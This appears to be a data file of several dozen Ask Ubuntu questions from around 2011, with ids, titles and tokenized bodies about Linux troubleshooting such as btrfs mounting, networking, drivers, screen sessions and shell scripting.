57422	btrfs partition wo n't mount after upgrading 64bit ubuntu 11.10 laptop	i have tried many ideas from the net , but none of them work . this looks correct and in good order **sudo btrfs filesystem show /dev/sda2** failed to read /dev/sr0 label : none uuid : daeedc21-7449-4b4a-ae55-e58a5a28a504 total devices 1 fs bytes used 4.02gb devid 1 size 32.60gb used 22.54gb path /dev/sda2 when i do a scan it returns what looks like a reasonable response : **sudo btrfsck -s /dev/sda2** found 4321669120 bytes used err is 0 total csum bytes : 4187576 total tree bytes : 23400448 total fs tree bytes : 12083200 btree space waste bytes : 6789166 file data blocks allocated : 4786331648 referenced 4126896128 btrfs btrfs v0.19 however , even when i use the degraded mount option , i still get an error in the logs , and it would appear that a good superblock can not be found . **sudo mount -o degraded -t btrfs /dev/sda2 /home** mount : wrong fs type , bad option , bad superblock on /dev/sda2 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so error seen in the log : [ 647.710937 ] device fsid 4a4b497421dceeda-4a5285a8ae555ae devid 1 transid 20368 /dev/sda2 [ 647.712760 ] btrfs : allowing degraded mounts [ 647.714378 ] parent transid verify failed on 7051943936 wanted 20368 found 20375 [ 647.714784 ] parent transid verify failed on 7051943936 wanted 20368 found 20375 [ 647.715182 ] parent transid verify failed on 7051943936 wanted 20368 found 20375 [ 647.760270 ] btrfs : open_ctree failed [ 1081.410560 ] device fsid 4a4b497421dceeda-4a5285a8ae555ae devid 1 transid 20368 /dev/sda2 this lappy has not had any sudden power-offs , and was just shutdown and restarted as normal after the daily updates . i am using a kingston ssd drive , but have been for months , so do n't think this should be a contributing factor . any pointers greatly received , as i would prefer to keep using btrfs , rather than having to move back to ext4 .
57423	classic gnome desktop appears instead of unity ?	this is a problem that started very recently : every time i turn my computer on , ubuntu boots into a classic gnome desktop session instead of unity , which is set to the default login option . also , the gnome desktop loads a resolution of 1024x768 instead of 1280x1024 , which is my default resolution . there is no option to put the resolution back in 1280x1024 . logging out and back in does n't fix the problem . only opening a terminal and typing unity -- reset seems to correct this . afterwards , unity works in the right resolution without any problems . i 'm using nvidia 8500gt and the current proprietary dirver installed through the `` additional drivers '' program . anyone has any idea what might be causing this ? i 'm using nvidia 8500gt and the current proprietary dirver installed through the `` additional drivers '' program . i am the one who asked the question , by the way , i just made an account right now .
57425	how do i use my fingerprint reader ?	i have a hp dv6190 that originally ran windows seven which the fingerprint reader worked fine with . does anyone know any software i can download to use it with . also if you could tell me the step by step process as i 'm still new to linux as a whole . right now i 'm running ubuntu 11.04 .
57426	how to connect my nokia c7 with ubuntu one ?	i am using nokia c7 phone . is that possible to connect it with ubuntu one folder ? if possible can any one suggest how to do that ?
57429	help with compiling error	i already compiled i already compiled libfreenect for natty and now i am trying to install kinect mouse : https : //github.com/ooblik/kinect-mouse/ but when i type make i receive an error ... this is the terminal : eric @ eric-desktop : ~ $ cd /home/eric/kinect_mouse eric @ eric-desktop : ~/kinect_mouse $ mkdir build eric @ eric-desktop : ~/kinect_mouse $ cd build eric @ eric-desktop : ~/kinect_mouse/build $ cmake .. -- the c compiler identification is gnu -- the cxx compiler identification is gnu -- check for working c compiler : /usr/bin/gcc -- check for working c compiler : /usr/bin/gcc -- works -- detecting c compiler abi info -- detecting c compiler abi info - done -- check for working cxx compiler : /usr/bin/c++ -- check for working cxx compiler : /usr/bin/c++ -- works -- detecting cxx compiler abi info -- detecting cxx compiler abi info - done -- looking for include files cmake_have_pthread_h -- looking for include files cmake_have_pthread_h - found -- looking for pthread_create in pthreads -- looking for pthread_create in pthreads - not found -- looking for pthread_create in pthread -- looking for pthread_create in pthread - found -- found threads : true -- looking for xopendisplay in /usr/lib/x86_64-linux-gnu/libx11.so ; /usr/lib/x86_64-linux-gnu/libxext.so -- looking for xopendisplay in /usr/lib/x86_64-linux-gnu/libx11.so ; /usr/lib/x86_64-linux-gnu/libxext.so - found -- looking for gethostbyname -- looking for gethostbyname - found -- looking for connect -- looking for connect - found -- looking for remove -- looking for remove - found -- looking for shmat -- looking for shmat - found -- looking for iceconnectionnumber in ice -- looking for iceconnectionnumber in ice - found -- found x11 : /usr/lib/x86_64-linux-gnu/libx11.so -- configuring done -- generating done -- build files have been written to : /home/eric/kinect_mouse/build eric @ eric-desktop : ~/kinect_mouse/build $ make scanning dependencies of target kmouse [ 100 % ] building c object cmakefiles/kmouse.dir/kinect_mouse.c.o linking c executable kmouse cmakefiles/kmouse.dir/kinect_mouse.c.o : in function `freenect_threadfunc ' : kinect_mouse.c : ( .text+0xd6d ) : undefined reference to `freenect_set_video_format' kinect_mouse.c : ( .text+0xd81 ) : undefined reference to `freenect_set_depth_format' collect2 : ld returned 1 exit status make [ 2 ] : *** [ kmouse ] error 1 make [ 1 ] : *** [ cmakefiles/kmouse.dir/all ] error 2 make : *** [ all ] error 2 eric @ eric-desktop : ~/kinect_mouse/build $
57433	summarize file sizes of a directory structure ?	i have written a small backup script with rsync . i would like to monitor its progress by comparing the total file sizes on the source and destination directories . du is inaccurate because it measures the disk usage , not the file size , and the disk usage varies between file systems . how can i summarize the file sizes of an entire directory structure ?
57434	is firefox 6 performance worse in ubuntu than upstream ?	it has been said that firefox 6 will perform better than previous version because it compiles with a newer version of gcc , version 4.5 , and aggressive optimization . when i updated to firefox 6 in natty i read the changelog and wondered whether firefox 6 really would perform better than previous version in ubuntu because one item in the changelog read ( the changelog can be read via apt-get changelog firefox ) : unconditionally build with -- disable-elf-hack . it 's basically a noop on ubuntu , as we do n't get any of the nice space saving and startup time improvements that upstream builds get with it . enabling it is problematic ( it fails to build on all architectures in ubuntu from firefox 7 onwards , and is already problematic on armel when building on older ubuntu versions ) what does this mean ? does it mean that firefox 6 performance worse in ubuntu than upstream ?
57437	configuring the pan network on bluetooth	i wanted to establish a tcp connection between my java-supported nokia x2-01 and my ubuntu desktop . i read several guides but they seem to be pretty old ( ubuntu ~8,9 ) . mainly the issue is with my bluetooth network not providing a dhcp server for my phone , so it does not get assigned an ip address . the older methods involve fiddling with the pand config files . i was wondering if there is a better gui based , or a simpler cli way to assign an ip address to my phone on connection . ifconfig gives the following output : bnep0 link encap : ethernet hwaddr 00:24:2b : f9:68:7c inet addr:10.0.66.3 bcast:10.0.66.15 mask:255.255.255.240 inet6 addr : fe80 : :224:2bff : fef9:687c/64 scope : link up broadcast running multicast mtu:1400 metric:1 rx packets:4 errors:0 dropped:0 overruns:0 frame:0 tx packets:59 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:760 ( 760.0 b ) tx bytes:8692 ( 8.6 kb ) but when i try to open 10.0.66.3 on my cell phone , it does not connect . i 'm using ubuntu 11.10 with gnome-shell .
57440	internet over ethernet : dns works , internet does n't ( windows works , linux does n't )	i have a pc connected to the internet using an ethernet connection . using ubuntu i am able to resolve domains using nslookup , but if i try to open an internet page , or use wget it does n't work . i have used arch linux , mint and ubuntu live on two netbooks , all of them unsuccessfully . windows , however , works just fine . ifconfig : sudo ifconfig eth0 eth0 link encap : ethernet hwaddr 00:26:18:80:79:18 inet addr:10.20.6.180 bcast:10.20.7.255 mask:255.255.254.0 inet6 addr : fe80 : :226:18ff : fe80:7918/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5751 errors:0 dropped:0 overruns:0 frame:0 tx packets:2397 errors:0 dropped:0 overruns:0 carrier:17 collisions:0 txqueuelen:1000 rx bytes:659976 ( 659.9 kb ) tx bytes:253881 ( 253.8 kb ) interrupt:40 route : route -n kernel ip routing table destination gateway genmask flags metric ref use iface 10.20.6.0 0.0.0.0 255.255.254.0 u 1 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 0.0.0.0 10.20.6.1 0.0.0.0 ug 0 0 0 eth0 0.0.0.0 10.20.6.1 0.0.0.0 ug 202 0 0 eth0 netstat : netstat -nr kernel ip routing table destination gateway genmask flags mss window irtt iface 10.20.6.0 0.0.0.0 255.255.254.0 u 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 eth0 0.0.0.0 10.20.6.1 0.0.0.0 ug 0 0 0 eth0 0.0.0.0 10.20.6.1 0.0.0.0 ug 0 0 0 eth0 iptables : sudo iptables -l chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination resolv.conf : cat /etc/resolv.conf # generated by resolvconf search uni-mannheim.de nameserver 134.155.96.51 nameserver 134.155.96.53 tracepath is not working : sudo tracepath www.google.com 1 : laptop.local 0.342ms pmtu 1500 1 : no reply 2 : no reply 3 : no reply 4 : no reply /etc/host.conf sudo cat /etc/host.conf # the `` order '' line is only used by old versions of the c library . order hosts , bind multi on /etc/nsswitch.conf sudo cat /etc/nsswitch.conf # /etc/nsswitch.conf # # example configuration of gnu name service switch functionality . # if you have the `glibc-doc-reference ' and `info ' packages installed , try : # `info libc `` name service switch '' ' for information about this file . passwd : compat group : compat shadow : compat hosts : files mdns4_minimal [ notfound=return ] dns mdns4 networks : files protocols : db files services : db files ethers : db files rpc : db files netgroup : nis nslookup google.com nslookup google.com server : 134.155.96.51 address : 134.155.96.51 # 53 non-authoritative answer : name : google.com address : 74.125.39.104 name : google.com address : 74.125.39.105 name : google.com address : 74.125.39.106 name : google.com address : 74.125.39.147 name : google.com address : 74.125.39.99 name : google.com address : 74.125.39.103 wget google.com wget google.com -- 2011-08-17 11:05:01 -- http : //google.com/ resolving google.com ... 74.125.39.99 , 74.125.39.103 , 74.125.39.104 , ... connecting to google.com|74.125.39.99|:80 ... dig google.com tracepath does n't work but dig does dig google.com ; < < > > dig 9.7.3 < < > > google.com ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : noerror , id : 2643 ; ; flags : qr rd ra ; query : 1 , answer : 6 , authority : 4 , additional : 4 ; ; question section : ; google.com . in a ; ; answer section : google.com . 175 in a 74.125.39.103 google.com . 175 in a 74.125.39.104 google.com . 175 in a 74.125.39.105 google.com . 175 in a 74.125.39.106 google.com . 175 in a 74.125.39.147 google.com . 175 in a 74.125.39.99 ; ; authority section : google.com . 104161 in ns ns4.google.com . google.com . 104161 in ns ns3.google.com . google.com . 104161 in ns ns1.google.com . google.com . 104161 in ns ns2.google.com . ; ; additional section : ns1.google.com . 277325 in a 216.239.32.10 ns2.google.com . 277325 in a 216.239.34.10 ns3.google.com . 277325 in a 216.239.36.10 ns4.google.com . 277325 in a 216.239.38.10 ; ; query time : 2 msec ; ; server : 134.155.96.51 # 53 ( 134.155.96.51 ) ; ; when : wed aug 17 11:06:14 2011 ; ; msg size rcvd : 260
57441	unable to log-in using ubuntu one files with the android application	i installed the ubuntu one files android app to my phone ( samsung i5800 ) . i have tried to register a number of times however , each time after signing in using my phone 's browser i see a `` we could n't find that page '' notification with no instructions on how to register . after logging out from ubuntu one from my phone 's browser , i try to log in through the app again but i get a `` log-in failed , please try again later '' prompt . can someone please help me with this before my business trip is ruined , i encouraged my boss to switch our cloud over from dropbox to ubuntu one and now i ca n't upload important documents and photos of samples to the cloud ! regards ,
57443	resizing partition capacity ?	i have a 500gb hard-drive . now im using ubuntu 11.04 with windows 7 ( dual boot ) . my ubuntu partition capacity is just 20gb . how can i resize it to 50gb ( using free space from another partitions ) ?
57444	upgrade xserver-xorg-input-synaptics	i have a thinkpad x220i . i 'm using natty . the touchpad works ok , but the pointer is `` shaky '' which is really distracting . i tested the oneiric alpha 3 and there the touchpad works fine out of the box . the synaptics package in the oneiric repos is 1.4.1 , in natty it is 1.3.99 . how can i upgrade to the 1.4.1 version ?
57445	main display on external monitor	my natty laptop is attached to an external monitor . when working with both monitors , the `` main '' monitor ( with the gnome menu ) is always on the laptop . is there a way i can set my external monitor as the main one ?
57448	screencast with both mic and system sounds at the same time	i 'd like to make a screencast that records both mic ( audio input ) and system sounds ( audio output ) at the same time . for example , so that i can capture a screencast while talking to someone on skype and capture both sides of the conversation . how can i do this ? ( i 'm using natty if it matters . ) so far i have tried kazam , recordmydesktop and tibesti . ( tibesti explicitly has this feature but it does n't seem to work . kazam has existing enhancement requests for this feature . ) please provide complete instructions/options , like those given for running recordmydesktop from the command line in this generic screencasting answer .
57449	display driver issue on an hp tx2-1160ea notebook	i 'm new to linux and recently switched to ubuntu 11.04 due to my project requirement . my laptop has been freezing and going to black screen of death when i run anything related to display ( share desktop , stream video , etc ) . today i went through the ubuntu forum to install the appropriate graphic driver and , after doing it , i rebooted my pc . it gave an error before login saying `` select the recovery mode '' and after clicking ok , it did n't give the same error on reboot but i 've lost the 11.04 graphical interface and all i see is the interface of ubuntu v10 with slow visuals ( even scrolling up/down on browser is really slow ) . for the reference , here 's a desktop screenshot so that you can understand the situation . also the laptop is overheating . how can i fix this problem ? how can i get the ubuntu 11.04 view back ? i also tried google , but could n't find any issue like this . some general information : laptop : hp touchsmart tx2-1160ea processor : amd turion tx2 memory : 4gb os : ubuntu 11.04 some debugging information : : $ report-hw | grep controller lspci -knn : 00:11.0 sata controller [ 0106 ] : ati technologies inc sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] [ 1002:4391 ] lspci -knn : 00:14.3 isa bridge [ 0601 ] : ati technologies inc sb7x0/sb8x0/sb9x0 lpc host controller [ 1002:439d ] lspci -knn : 01:05.0 vga compatible controller [ 0300 ] : ati technologies inc rs780m/rs780mn [ radeon hd 3200 graphics ] [ 1002:9612 ] lspci -knn : 08:00.0 network controller [ 0280 ] : broadcom corporation bcm4322 802.11a/b/g/n wireless lan controller [ 14e4:432b ] ( rev 01 ) lspci -knn : 09:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 02 ) and : $ dpkg -l '*fglrx*' desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-==============-==============-============================================ ii fglrx 2:8.840-0ubunt video driver for the ati graphics accelerato ii fglrx-amdcccle 2:8.840-0ubunt catalyst control center for the ati graphics un fglrx-control < none > ( no description available ) un fglrx-control- < none > ( no description available ) ii fglrx-dev 2:8.840-0ubunt video driver for the ati graphics accelerato un fglrx-driver < none > ( no description available ) un fglrx-driver-d < none > ( no description available ) un fglrx-kernel-s < none > ( no description available ) un fglrx-modalias < none > ( no description available ) un xfree86-driver < none > ( no description available ) un xfree86-driver < none > ( no description available ) un xorg-driver-fg < none > ( no description available ) un xorg-driver-fg < none > ( no description available ) if you need any more information that could help , just ask .
57450	phillips saa7130 tv tuner card not working	i have tried all the web help http : //www.gentoo-wiki.info/saa7134 but still ca n't view on ubuntu works fine on windows . some output which could help you : [ 11.269072 ] tuner-simple 1-0060 : type set to 37 ( lg pal ( newer tapc series ) ) [ 11.375732 ] type=1505 audit ( 1313058682.363:7 ) : operation= '' profile_replace '' pid=699 name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' [ 11.376183 ] type=1505 audit ( 1313058682.367:8 ) : operation= '' profile_replace '' pid=699 name= '' /usr/lib/connman/scripts/dhclient-script '' [ 11.389261 ] saa7130 [ 0 ] : registered device video0 [ v4l2 ] [ 11.389323 ] saa7130 [ 0 ] : registered device vbi0 [ 11.389376 ] saa7130 [ 0 ] : registered device radio0 [ 11.408369 ] type=1505 audit ( 1313058682.399:9 ) : operation= '' profile_load '' pid=702 name= '' /usr/bin/evince '' [ 11.415983 ] saa7134 alsa driver for dma sound loaded [ 11.415991 ] saa7130 [ 0 ] /alsa : lifeview/typhoon flyvideo2000 does n't support digital audio dmesg : [ 10.943726 ] saa7130 [ 0 ] : subsystem : 1131:0000 , board : lifeview/typhoon flyvideo2000 [ card=3 , insmod option ] [ 10.943753 ] saa7130 [ 0 ] : board init : gpio is 4000 [ 10.943759 ] saa7130 [ 0 ] : there are different flyvideo cards with different tuners [ 10.943761 ] saa7130 [ 0 ] : out there , you might have to use the tuner= < nr > insmod [ 10.943763 ] saa7130 [ 0 ] : option to override the default value . [ 10.943982 ] input : saa7134 ir ( lifeview/typhoon fl as /devices/pci0000:00/0000:00:1e.0/0000:01:01.0/input/input4 [ 10.944178 ] irq 20/saa7130 [ 0 ] : irqf_disabled is not guaranteed on shared irqs [ 11.053642 ] saa7130 [ 0 ] : huh , no eeprom present ( err=-5 ) ? [ 11.053649 ] i2c i2c-1 : invalid 7-bit address 0x7a [ 11.073437 ] fb0 : inteldrmfb frame buffer device [ 11.073443 ] registered panic notifier [ 11.073457 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 11.093894 ] vga16fb : initializing [ 11.093902 ] vga16fb : mapped to 0xc00a0000 [ 11.093909 ] vga16fb : not registering due to another framebuffer present [ 11.120937 ] alloc irq_desc for 17 on node -1 [ 11.120943 ] alloc kstat_irqs on node -1 [ 11.120957 ] intel ich 0000:00:1e.2 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 11.121030 ] intel ich 0000:00:1e.2 : setting latency timer to 64 [ 11.204035 ] all bytes are equal . it is not a tea5767 [ 11.204138 ] tuner 1-0060 : chip found @ 0xc0 ( saa7130 [ 0 ] ) [ 11.220046 ] tuner-simple 1-0060 : creating new instance [ 11.220051 ] tuner-simple 1-0060 : type set to 37 ( lg pal ( newer tapc series ) ) [ 11.232474 ] console : switching to colour frame buffer device 128x48 [ 11.248174 ] saa7130 [ 0 ] : registered device video0 [ v4l2 ] [ 11.248242 ] saa7130 [ 0 ] : registered device vbi0 [ 11.248310 ] saa7130 [ 0 ] : registered device radio0 [ 11.256206 ] saa7134 alsa driver for dma sound loaded [ 11.256214 ] saa7130 [ 0 ] /alsa : lifeview/typhoon flyvideo2000 does n't support digital audio i have tried all options with different cards and tuners but nothing works except on some occasion where composite 2 one channel is seen . what can i do i desperately need to make the tv live . i have tv time installed .
57458	printing to a printer attached to a network usb hub	i have this device . it is connected to my router and allows the windows pcs in my house to use printers , usb speakers , external hds , etc ... that are plugged into it as though they were plugged into local usb ports . the software that came with the device does not work under linux . is there any other way to get ubuntu to communicate with this network usb hub and use the devices attached to it ?
57459	is there a way `` extract and delete zip file '' in a single command ?	is there a way ( preferrable via gui , but may be via command line ) to extract a zip file and delete the zip after extracted , all in a single command ? ( i remember i saw someone doing something like this in the command line one day )
57463	is window snap/grid part of unity ?	i know natty comes with the snap feature like windows 7 does , but is that part of unity or natty itself ? basically , if i switch to gnome 2 instead of unity will i still have window snap ? ( if anyone would like to recommend a compiz setting to mimic it , go right ahead )
57465	prevent suspend if logged in via ssh to another machine	previously i have found that ubuntu would not suspend if an ssh session was open , but on a new laptop install of ubuntu 11.04 i find that the laptop will go into suspend according to it 's normal schedule , even though there was an open ssh connection . suspending means the connection is closed , and tasks taking place on the remote machine are cancelled . any idea how to get the previous behaviour back ?
57466	can not open .doc files	as far as i understand , libreoffice writer should be able to open .doc files . mine is not working . it says `` file type ole2 compound document storage ( application/x-ole-storage ) is not supported '' . how do i fix this ? ? please help ! ! !
57473	how do i get tab completion to work with 'rake ' ?	when i try to use tab completion with rake , only files are suggested : $ rails test-app | grep -v create ; cd test-app $ rake < tab > < tab > app/ db/ lib/ public/ readme test/ vendor/ config/ doc/ log/ rakefile script/ tmp/ the package rake-0.8.7-2 includes a bash completion configuration file , $ debsums -e rake /etc/bash_completion.d/rake ok so i expect that pressing tab should suggest the tasks available to rake : $ rake -- tasks ( in ~/sandbox/test-app ) rake db : abort_if_pending_migrations # raises an error if there are pending migrations rake db : charset # retrieves the charset for the current environment 's database rake db : collation # retrieves the collation for the current environment 's database rake db : create # create the database defined in config/database.yml for the current rail ... rake db : create : all # create all the local databases defined in config/database.yml rake db : drop # drops the database for the current rails_env ... what am i doing wrong ? the problem persists after reinstalling rake and restarting my computer . my ~/.bashrc contains : if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi but completion for rake does n't appear to be registered : $ complete | grep rake $ explicitly running . /etc/bash_completion in the shell does n't solve the problem , but running the following command does enable completion for rake temporarily : $ grep complete /etc/bash_completion.d/rake [ -n `` $ { have : - } '' ] & & complete -f _rake $ filenames rake $ complete -f _rake rake $ rake < tab > < tab > db : abort_if_pending_migrations db : version rails : update db : charset doc : app rails : update : application_controller db : collation doc : clobber_app rails : update : configs db : create doc : clobber_plugins rails : update : generate_dispatchers db : create : all doc : clobber_rails rails : update : javascripts db : drop doc : guides rails : update : scripts ...
57476	unable to remove 'residual config ' packages in synaptic package manager	i am using 11.04 with synaptic package manager ( ver 0.70 ) . when i select 'status ' and try to delete packages from the 'not installed ( residual config ) ' option , although i can select these old applications ( such as banshee and evolution which i do n't use ) and 'mark for removal ' , the 'apply ' button is not active and remains greyed out . i assume that i am administrator as i am the only user of the machine and can use the 'sudo ' prompt in terminal . what am i doing wrong ?
57477	bring nohup job to foreground	consider the following nohup execution : nohup script.sh > script.out & is there a way to log off the terminal , reconnect , bring the process back to foreground and interact with it using the keyboard ?
57478	find installed dictionary	i installed dict-freedict english-french from ubuntu software center . synaptic package manager shows it installed in section : word processing ( universe ) but i can not locate it . thank you .
57479	firefox render problem	i am using 64 bit version of ubuntu 11.04 , under ubuntu classic , using ati proprietary driver 11.5 . i had absolutely no issue with previous versions of firefox , until i did an upgrade , and the entire window of firefox stops rendering properly , as seen in screen cap below . basically besides the window control bar on top , everything else seems to be double rendered and one of the render is miss aligning the y axis . am i the only one seeing this ? and how do i fix it ?
57493	save print server authentication credentials	at my work , i print through a print server . my /etc/cups.d/client.conf file is : servername the.appropriate.server.location with this configuration i have to log in with a username and a password every time i have to print ( and even twice each time , the first time to get the printer settings , and the second time to effectively print ) . i precise that i am usually printing via evince ( since i print pdf files and evince is my favorite pdf viewer ) . how can i avoid logging in twice ? is it possible not to have to log in , even once , at each printing ?
57495	monitor goes to sleep in the middle of installation	i installed ubuntu on my laptop and it was successful . i liked it so much that i wanted to install it on my desktop . when i try to install onto the desktop the monitor goes to sleep when ubuntu is halfway installed . i think the graphics cards is an issue , but i do n't know . i have a nvidia geforce 9600 gs graphics card . i 've tried the following but these have not worked - the monitor always goes to sleep : two different monitors via vga . dual boot with wubi installing via the live cd installed a brand new hard drive just for ubuntu , installing via the alternate cd tried nomodeset tried noapic i found the solution to my problem graphic card was over heating . is fix now and ubuntu is up and running.thank you guys for the help ! ! ! ! !
57502	how to set up vnc server ?	i want to set up a vncserver on my machine . i need each remote user to start separate session - so they see the login screen after connecting , log in , and so on - without interrupting another users . how this can be done ?
57506	unity home quicklist not working	hello i have tried adding some quicklists to the unity launcher i added some to the gnome-terminal and they work fine added some to the nautilus-home but can not get them to display here is my .desktop file [ desktop entry ] name=home folder comment=open your personal folder tryexec=nautilus exec=nautilus -- no-desktop icon=user-home terminal=false startupnotify=true type=application categories=gnome ; gtk ; core ; onlyshowin=gnome ; unity x-gnome-bugzilla-bugzilla=gnome x-gnome-bugzilla-product=nautilus x-gnome-bugzilla-component=general x-ubuntu-gettext-domain=nautilus x-ayatana-desktop-shortcuts=bin ; documents ; downloads ; pictures ; video ; music ; ubuntu one ; src ; [ bin desktop shortcut group ] name=bin exec=nautilus bin targetenvironment=unity [ documents desktop shortcut group ] name=documents exec=nautilus documents targetenvironment=unity [ downloads desktop shortcut group ] name=downloads exec=nautilus downloads targetenvironment=unity [ pictures desktop shortcut group ] name=pictures exec=nautilus pictures targetenvironment=unity [ video desktop shortcut group ] name=video exec=nautilus video targetenvironment=unity [ music desktop shortcut group ] name=music exec=nautilus music targetenvironment=unity [ ubuntu one desktop shortcut group ] name=ubuntu one exec=nautilus ubuntu\ one targetenvironment=unity [ src desktop shortcut group ] name=src exec=nautilus src targetenvironment=unity
57510	what gtk+ 3 engines are available ?	with the switch to gtk+ 3.x , most theme engines no longer work , and i personally only know of 3 ( adwaita , unico , and solidity ) . what engines are available for use with gtk+ 3.x ?
57511	vmware workstation 6.5.5 ( 64-bit ) on ubuntu 10.04 ( 64-bit ) odd problem	i managed to successfully install vmware workstation 6.5.5 ( 64-bit ) on ubuntu 10.04 ( 64-bit ) . it works in principle but there is one issue that forced me to stick with ubuntu 8.04 ( for now ) : when the guest vm is microsoft windows ( 2k , xp ) , the mouse cursor turns from an arrow to a hand when it hovers over the task bar ( or close to it -- the problem is not limited to the task bar area but rather to an arbitrary margin on the outer side of the desktop . this margin can be as wide as 1/8 of the guest 's desktop. ) . when the mouse moves , this hand cursor blinks and the system does n't respond to mouse clicks . when the hand cursor blinks , the num lock led on my keyboard blinks as well . when i move the mouse cursor back to `` the desktop area '' ( as defined in the highlighted text above ) , it functions normally . that is , the problem exists only outside that `` desktop area '' . obviously , this makes it very difficult ( read : impossible ) for me to use the start menu , systray and the rest of the task bar . my workaround for now is to launch programs via their desktop shortcuts or via the keyboard . note : the same exact vmware workstation 6.5.5 ( 64-bit ) on ubuntu 8.04 ( 64-bit ) does n't exhibit this problem . anyone seen this problem before ? do you know of a solution ( or better workaround ) to this problem ?
57512	how do i set up aqemu / kvm tap device ?	i 'm trying to use aqemu and i 'm trying to figure out how to just have the network in the virtual machine connected to a tap device on the real machine . how do i set this up ? do i need to make the tap device before hand ? what should i set in aqemu ?
57514	should i move from 32 bit to 64 bit ?	i am curently using ubuntu 11.04 32 bit recently i upgrade my processor to 1.8ghz amd turion 64 x2 tl-56 dual core should i use ubuntu 64 bit instead of the 32 bit ? thank you
57517	scrolling with trackpad	i have a lenovo g550 , i want to activate the scrolling ( right border ) of my touchpad . it works with windows , but in ubuntu i ca n't find the way to do it . i see `` mouse config '' , scrolling is activated but it doens't work . any idea ?
57519	prevent kernel modules filesystems ; ( xfs , jfs , reiserfs ) from loading	i noticed just about all the file system modules are loaded by default on boot - filesystems i 'll never use . these include atleast : module size used by jfs 182186 0 xfs 823190 0 reiserfs 248223 0 btrfs 550402 0 ufs 75815 0 qnx4 17685 0 hfsplus 84797 0 minix 36367 0 ntfs 101769 0 is there anything i can do to prevent these being loaded ?
57526	how can i cluster two machines to double the processing power ?	if i had two computers running ubuntu server ( or just one ) could i `` hook '' the two machines together to double processing power ? how would that work ?
57528	can i install server edition alongside/after a desktop installation ?	if i install ubuntu , can i install the server afterwards ? like , i install ubuntu on one partition then use apt-get or something similar to get the server ?
57532	what could be causing background cd drive access ?	i 've got a brand new clean install of ubuntu 10.04 running on a 6-year-old hp laptop . everything works fine with one exception : periodically ( say once or twice an hour ) the machine will completely freeze for a few seconds while the built-in cd drive spins into life . the mouse , keyboard and trackpad are all unresponsive while this happens , then the drive spins down again and everything comes back to life . any idea what might be causing this ? i 've installed very little on it : the only app i can think of that involves background file access is dropbox . might that be the culprit ?
57533	how do i run a graphical application in a virtual console besides < alt+f7 > ?	i want to run r in a virtual console and rcommander in a separate virtual console . or maybe i want to run a game in a virtual console and shut off the desktop . or maybe i want to pipe an ssh -x terminal to a virtual console . how can i tell virtual console 3 to open a graphical virtual console in virtual console 9 ?
57538	diagnose a system that does n't boot	i have fiddled with the wrong drivers ( it was working fine before ) and now i 'm where many have been , where the system does n't boot . boot hangs at a certain point . for me it 's when you get all those messages with [ ok ] at the end . i can ctrl+alt+f1 ( do n't know what that 's called yet -- console ? ) , and that 's about it that i know . i do n't really know where to begin to solve it . how do you diagnose a system that hangs somewhere at boot ?
57540	how to create grub boot disk ?	so i 'm doing a test . i 've installed windows 7 and ubuntu 11.04 side-by-side . now , i 'd like to be able to launch the ubuntu install from within windows using virtualbox . i was following the instructions here but they do n't seem to apply to 11.04 . i got stuck on step 2 . /usr/lib/grub/*-pc/stage2_eltorito and /boot/grub/menu.lst do n't exist . if you can tell me where to find those , that would be a good start . however , using find / -name menu.lst yielded no results . how do i create a grub boot disk that i can use with virtualbox in 11.04 ?
57541	screen rtorrent freezes when using screen for other programs	i use screen rtorrent and it always works fine by itself . however if i also open another instance of screen then the rtorrent session freezes ! maybe i am not opening multiple screens correctly ? here is an example : $ screen rtorrent # works fine - i can move around with the arrow keys and the page refreshes when things like the download rate change $ ctrl a+d # exit rtorrent and return to the shell $ screen cp /tmp/x1 /tmp/x2 # assume x1 is very large so this takes a long time $ ctrl a+d # exit the copying and return to the shell $ screen -ls there are screens on : 26608.pts-0.hostname ( 18/08/11 10:15:39 ) ( detached ) 8329.pts-0.hostname ( 17/08/11 13:44:00 ) ( detached ) 2 sockets in /var/run/screen/s-username . $ screen -r 8329.pts-0.hostname # resume rtorrent and now it is frozen - i can not move around with arrow keys and the page never updates does anyone know a solution ? i have a feeling this problem is repeatable - you could try using screen top instead of my copying example above to simulate it . is there some control command i can press in screen to fix it or should i run rtorrent with more screen options in the first place ? i am using rtorrent version 0.8.2 and screen version 4.00.03jw4 ( fau ) 2-may-06 thanks in advance !
57544	why is the network indicator saying `` device not managed '' when running ubuntu in virtualbox ?	i have just setup ubuntu 11.04 on virtual box ose . i notice that my network ( or all indicators ) applet is not working , it says `` device not managed '' . i do have working internet though . is this a ubuntu/virtualbox problem ? i installed a command line system with alternate cd then installed ubuntu and the packages i need .
57545	arithmetic binary operators -gt , -lt give error but work in a shell script	i wrote this simple script it works too but shows an error clear echo enter 1st number read n1 echo enter 2nd number read n2 echo multi is `expr $ n1 \* $ n2` ; if [ $ n1 -lt $ n2 ] then echo $ n1 'is bigger than ' $ n2 else echo $ n2 'is bigger than ' $ n1 fi output enter 1st number 5 enter 2nd number 10 multi is 50 ./script.sh : line 7 : [ 5 : command not found 10 is bigger than 5
